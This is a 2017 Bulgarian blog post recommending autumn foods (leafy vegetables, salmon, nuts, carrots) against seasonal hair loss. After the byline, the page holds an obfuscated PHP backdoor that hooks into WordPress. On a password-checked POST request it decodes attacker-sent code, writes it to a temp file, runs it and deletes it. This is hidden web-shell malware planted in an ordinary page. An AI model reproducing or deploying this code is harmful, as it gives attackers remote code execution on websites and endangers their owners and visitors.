Какво да ядем през есента, за да се спасим от сезонния косопад? Виж Тук: | Косопад

Какво да ядем през есента, за да се спасим от сезонния косопад? Виж Тук:

Здравето на косата се определя от редица фактори. Сред най- важните от тях е храненето. Ако искаме да се радваме на здрава и красива коса, трябва да обръщаме специално внимание на храната, която приемаме.

Има определени видове, които са особено полезни за състоянието на скалпа и косъма. Особено в периода на сезонния косопад, е важно да знаем на какво да наблегнем в ежедневното си меню.

Ето 4 групи храни, които не трябва да пропускаме, ако искаме да имаме здрава коса през есента:

Зеленчуци
Особено полезни за състоянието на косата. Сред най- препоръчителните са маруля, спанак, броколи, краставици, зелен фасул и пр. Те съдържат големи количества витамин А и С, които поддържат косъма хидратиран. Повечето зеленолистни зеленчуци са богати на желязо и фолиева киселина, така че предпазват от сезонния косопад.

Тлъста риба
Този вид риби са особено полезни за косата. Най- известният представител е сьомгата. Тези риби са изключително богати на омега- 3 мазнини, които подобряват еластичността на косъма. Освен това, съдържат големи дози витамини В.

Ядки
Орехите и бадемите съдържат високи дози селен, който е много полезен за здравето на косата и на скалпа. Повечето ядки съдържат също цинк. Богати са също на витамини В.

Моркови
Богат е изключително разнообразие от витамини и минерали, които са полезни за косата. Съдържа витамини А, В и С. Също така ценните бетакаротени.

24. октомври 2017 11:17:43 от Надя Колева
Категории: Любопитно за косопада | Етикети: , , , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}